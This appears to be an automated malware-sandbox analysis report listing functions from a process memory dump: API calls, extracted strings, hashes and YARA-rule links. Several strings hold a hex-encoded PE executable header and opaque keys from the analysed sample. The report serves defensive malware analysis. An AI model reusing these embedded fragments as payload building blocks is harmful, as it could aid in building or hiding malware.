                                                                                                                                                        • Instruction ID: 30713c19b03f3f4f1992eff173ed770ad634efe6af108018b13de84756ef9071
                                                                                                                                                        • Opcode Fuzzy Hash: beafc64d84d7510b4100caaec8acd72ae3e66ef07b6c534b2c2d0b05f7869d39
                                                                                                                                                        • Instruction Fuzzy Hash: 5BC04C22A9D53129258832597C47CEB414E8D55321365066FB501652866D892D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040ABBA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040ABC1
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 73a8d02b19ff0e2bfc922d101961fe450dcb6e96c370892bb4f149452e727699
                                                                                                                                                        • Instruction ID: 23f499729a52fb6bfcbaee7a70b6625b19a32be85a4aefd9d6972a6fceb7ea7e
                                                                                                                                                        • Opcode Fuzzy Hash: 73a8d02b19ff0e2bfc922d101961fe450dcb6e96c370892bb4f149452e727699
                                                                                                                                                        • Instruction Fuzzy Hash: CFC04CA299E5312A258432687847CEF818E8D66721351067FB510651816D891DC202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409043, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040904A
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 7d5ba705a8eeb81d9905c94b2e56d838e9a411ed904644901d2930c77c1d5b10
                                                                                                                                                        • Instruction ID: c59f49c02157581852eba3ae34fc1396fad1995ca9a2f19d5f46631a84fb8e0e
                                                                                                                                                        • Opcode Fuzzy Hash: 7d5ba705a8eeb81d9905c94b2e56d838e9a411ed904644901d2930c77c1d5b10
                                                                                                                                                        • Instruction Fuzzy Hash: F8C08C228AD03069208432283C47CEF018E8E63321312027FF800611816C881D8203FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00405269, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00405270
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • L2x, xrefs: 00405278
                                                                                                                                                        • ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52, xrefs: 0040526A, 00405277
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: L2x$ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52
                                                                                                                                                        • API String ID: 4000879885-1905535759
                                                                                                                                                        • Opcode ID: f8f9517cefb403a5ec7d415236731cb2ac74da1c515f7cf2d1224b8083d0f9e1
                                                                                                                                                        • Instruction ID: 326df40cfceb65b97620db7ab3e8cf50de32f187b18cfe2f07b1eff00aa23be0
                                                                                                                                                        • Opcode Fuzzy Hash: f8f9517cefb403a5ec7d415236731cb2ac74da1c515f7cf2d1224b8083d0f9e1
                                                                                                                                                        • Instruction Fuzzy Hash: 7AC04C2299D530292584365C3C47CEB418E8E56720351066FB500A55866D895DC202FE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040528F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00405296
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 42x$7576506552704f42
                                                                                                                                                        • API String ID: 4000879885-1282338854
                                                                                                                                                        • Opcode ID: e5ce9ea356a47d49d67837ddae67c084c65f8c4e562454a4a6927dfadb85e300
                                                                                                                                                        • Instruction ID: ef2ab2805cfe192c1f59f11111d34b71d8a7500aa6f93c83f5b53d3b9abfe1e5
                                                                                                                                                        • Opcode Fuzzy Hash: e5ce9ea356a47d49d67837ddae67c084c65f8c4e562454a4a6927dfadb85e300
                                                                                                                                                        • Instruction Fuzzy Hash: 57C04C5295E53169258432587847CEB415E9D5672436107BFF610661916D891D8202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004052B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004052BC
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: d3483017b87391fdf58053c57ccf5d2e72f8c23c5bc9d31d0bbe960491ffe1c1
                                                                                                                                                        • Instruction ID: 93dff822f8a379dc5aa1a8971b0f28f38898b86cba4d6c536c42691786c614d4
                                                                                                                                                        • Opcode Fuzzy Hash: d3483017b87391fdf58053c57ccf5d2e72f8c23c5bc9d31d0bbe960491ffe1c1
                                                                                                                                                        • Instruction Fuzzy Hash: 69C04C1699D53069258432583C47CEF418E9D66721351077FF510A61826D896D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040D3F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040D3F9
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 3ede84872919cfcbbb757d78bdf9755c6f3673e9166c49141f2a26c22ea5cc30
                                                                                                                                                        • Instruction ID: 8d04647860acef6f2a699f50dc2e15738198c707edcd4c76c6512e49d73221a4
                                                                                                                                                        • Opcode Fuzzy Hash: 3ede84872919cfcbbb757d78bdf9755c6f3673e9166c49141f2a26c22ea5cc30
                                                                                                                                                        • Instruction Fuzzy Hash: B8C04C169AD53039259432683847CEF418E8D66721351067FB910661816D896D8202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00403477, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040347E
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 00403478, 0040347D, 00403485
                                                                                                                                                        • .x, xrefs: 00403486
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$.x
                                                                                                                                                        • API String ID: 4000879885-464414995
                                                                                                                                                        • Opcode ID: 8da0d91b67cc42b13f70ab05cf9a3529969e06d1b9635911ada681b4671e0fc8
                                                                                                                                                        • Instruction ID: 830840552dfd160b6bda39a11094b1cd4d35f0f339568b6f5458b0f776678e41
                                                                                                                                                        • Opcode Fuzzy Hash: 8da0d91b67cc42b13f70ab05cf9a3529969e06d1b9635911ada681b4671e0fc8
                                                                                                                                                        • Instruction Fuzzy Hash: D4C04C2699D53029258432593C47CEB424E8D65321351266FF910652826D891DC303BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040B413, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B41A
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 0040B414, 0040B419, 0040B421
                                                                                                                                                        • l6x, xrefs: 0040B422
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$l6x
                                                                                                                                                        • API String ID: 4000879885-1101837068
                                                                                                                                                        • Opcode ID: 65dc3e58c5d9297ae6db9c83a4bd99c9da7f5b117d4ab5d135e6838759215a3d
                                                                                                                                                        • Instruction ID: d3aa2f57e54d24bc6a860b68f6f30e676ecfefde93ecd87338176790797d4409
                                                                                                                                                        • Opcode Fuzzy Hash: 65dc3e58c5d9297ae6db9c83a4bd99c9da7f5b117d4ab5d135e6838759215a3d
                                                                                                                                                        • Instruction Fuzzy Hash: F8C04C5299D5302A2584325C3C47CEB458E8D9572139216AFF500652817D995DC202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004034E9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004034F0
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: dd79432bb935599774e904eb2f1ec88bdc8f4ed95a5074b6a51235b103b68cce
                                                                                                                                                        • Instruction ID: f2349b061beca73a8e9bff4bd078e2673f3dba727cf1baefd91fd6199e3ef5ae
                                                                                                                                                        • Opcode Fuzzy Hash: dd79432bb935599774e904eb2f1ec88bdc8f4ed95a5074b6a51235b103b68cce
                                                                                                                                                        • Instruction Fuzzy Hash: C7C04C269AD53029258832583847CEF419E8D66721351067FB510652826D891D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040B485, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B48C
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 7378b691dd7909edf9e1cb6565478b6c5a502c75681267797090380d43ede441
                                                                                                                                                        • Instruction ID: da6d600d92dce1997e274023e91c7939c5b56fe1d1b8aff33866751f64e583cf
                                                                                                                                                        • Opcode Fuzzy Hash: 7378b691dd7909edf9e1cb6565478b6c5a502c75681267797090380d43ede441
                                                                                                                                                        • Instruction Fuzzy Hash: D3C04C5699D5306A2585329D3847CEF418E8E66721352067FB511A52816D991D8202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00401833, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040183A
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 00401834, 00401841
                                                                                                                                                        • t+x, xrefs: 00401842
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$t+x
                                                                                                                                                        • API String ID: 4000879885-2901749208
                                                                                                                                                        • Opcode ID: 765463a4f0e9b8d7274e871b4b52d0bb23f15587168abd89dc8fd6375f803293
                                                                                                                                                        • Instruction ID: ffd475c174250f0d8cbca0506f5de37019642e77b83771b21a9a872015b8d5d2
                                                                                                                                                        • Opcode Fuzzy Hash: 765463a4f0e9b8d7274e871b4b52d0bb23f15587168abd89dc8fd6375f803293
                                                                                                                                                        • Instruction Fuzzy Hash: 8FC04C6299E5302D258836983847CEB465E8D65332351166FB501652826D891DC313BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004018CB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004018D2
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: ,+x$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                                                                                        • API String ID: 4000879885-509215643
                                                                                                                                                        • Opcode ID: a45c4a13653dbd6eb986ceed2981546742e6f566236506a8b18700b77595e0c0
                                                                                                                                                        • Instruction ID: da09028526cadc6e39ea780281bda461c4442b44a54ddfae4919c70394aa41fc
                                                                                                                                                        • Opcode Fuzzy Hash: a45c4a13653dbd6eb986ceed2981546742e6f566236506a8b18700b77595e0c0
                                                                                                                                                        • Instruction Fuzzy Hash: 7FC04C6699E53029258536683C47CEF428E8E56761352067FF900652936D8A1D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004018A5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004018AC
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 87576dafdab4ded838b6d594d26134164294586d03ca20f1ecfb60b0f10db701
                                                                                                                                                        • Instruction ID: c7825c53cdfd4f12779c3fe24959c311fcfe7353446e4b5160739715df8d938d
                                                                                                                                                        • Opcode Fuzzy Hash: 87576dafdab4ded838b6d594d26134164294586d03ca20f1ecfb60b0f10db701
                                                                                                                                                        • Instruction Fuzzy Hash: 37C04C6699E53129258836983847CEF428E8E66321351067FF915662826DC91D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004099FE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00409A05
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 7576506552704f42$4x
                                                                                                                                                        • API String ID: 4000879885-3606846068
                                                                                                                                                        • Opcode ID: 81ce9fa8fcdf694ead42efabf904605c9872aa294ef6fc6b16144f3aaa3e7310
                                                                                                                                                        • Instruction ID: 3c498a418637e3dfd1c50d85447176ea39f07b8152abade3bf69d44dcd66f597
                                                                                                                                                        • Opcode Fuzzy Hash: 81ce9fa8fcdf694ead42efabf904605c9872aa294ef6fc6b16144f3aaa3e7310
                                                                                                                                                        • Instruction Fuzzy Hash: EDC02B2285D530292184325D7C03CFF014E8D81330362037FF50061181ACC90CC303FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409A24, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00409A2B
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: c2491a07dc4469722bbb4680f9ae883a3a9475151fd449103a1e3961f3a9fa1e
                                                                                                                                                        • Instruction ID: df9d5d26a1ca0de4eecd05fd668f611b37ec6b1afeeacc29b07da1b8d6e972b3
                                                                                                                                                        • Opcode Fuzzy Hash: c2491a07dc4469722bbb4680f9ae883a3a9475151fd449103a1e3961f3a9fa1e
                                                                                                                                                        • Instruction Fuzzy Hash: 95C04C2299D5306925C9326D3847CEF418E8DA6721352067FB51475282ADC91D8203FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040F270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateHardLinkW), ref: 0040F27A
                                                                                                                                                          • Part of subcall function 005C6A10: GetProcAddress.KERNEL32(?,?), ref: 005C6A18
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                        • API String ID: 1646373207-294928789
                                                                                                                                                        • Opcode ID: 699e2d7b0c3591995e5e6bf75acb16ebeb4ae7f70bda97d14c4cd711314aaae0
                                                                                                                                                        • Instruction ID: 9c56cea4b4eb40840ee6c77f750cea53d91e62e982e378573b4a0763a5d126f9
                                                                                                                                                        • Opcode Fuzzy Hash: 699e2d7b0c3591995e5e6bf75acb16ebeb4ae7f70bda97d14c4cd711314aaae0
                                                                                                                                                        • Instruction Fuzzy Hash: 89B092B5D42341AA87002BA2AC1EA1D3E1AA56572A7818827F002A6656EE641251576A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040F290, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateSymbolicLinkW), ref: 0040F29A
                                                                                                                                                          • Part of subcall function 005C6A10: GetProcAddress.KERNEL32(?,?), ref: 005C6A18
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: CreateSymbolicLinkW$kernel32.dll
                                                                                                                                                        • API String ID: 1646373207-1962376091
                                                                                                                                                        • Opcode ID: 59b0ccb2ed71d6c7bf0c4f77b8bc1e6fd216f8acdafea6e3f1c75a6b7d643419
                                                                                                                                                        • Instruction ID: 94dbf716fcc39379530ff690dc3fc02cb93e2bb9900781afd53ec2bd5da3e712
                                                                                                                                                        • Opcode Fuzzy Hash: 59b0ccb2ed71d6c7bf0c4f77b8bc1e6fd216f8acdafea6e3f1c75a6b7d643419
                                                                                                                                                        • Instruction Fuzzy Hash: 9FB09BE5D416419E860017A26C1ED1839155551717741C417F001B6655DD7401115B15
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00693E00, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00693E96
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00693EA4
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00693EFF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                        • Opcode ID: cd7db9f3759a9b4860ecfb3c63f341ef4a80bfc4c243400211ed172ce1e1ef1b
                                                                                                                                                        • Instruction ID: e70d3226075efeb10ac84df75dc0a4f2f91686cb528fd4b8789b6f2ab40c7ac8
                                                                                                                                                        • Opcode Fuzzy Hash: cd7db9f3759a9b4860ecfb3c63f341ef4a80bfc4c243400211ed172ce1e1ef1b
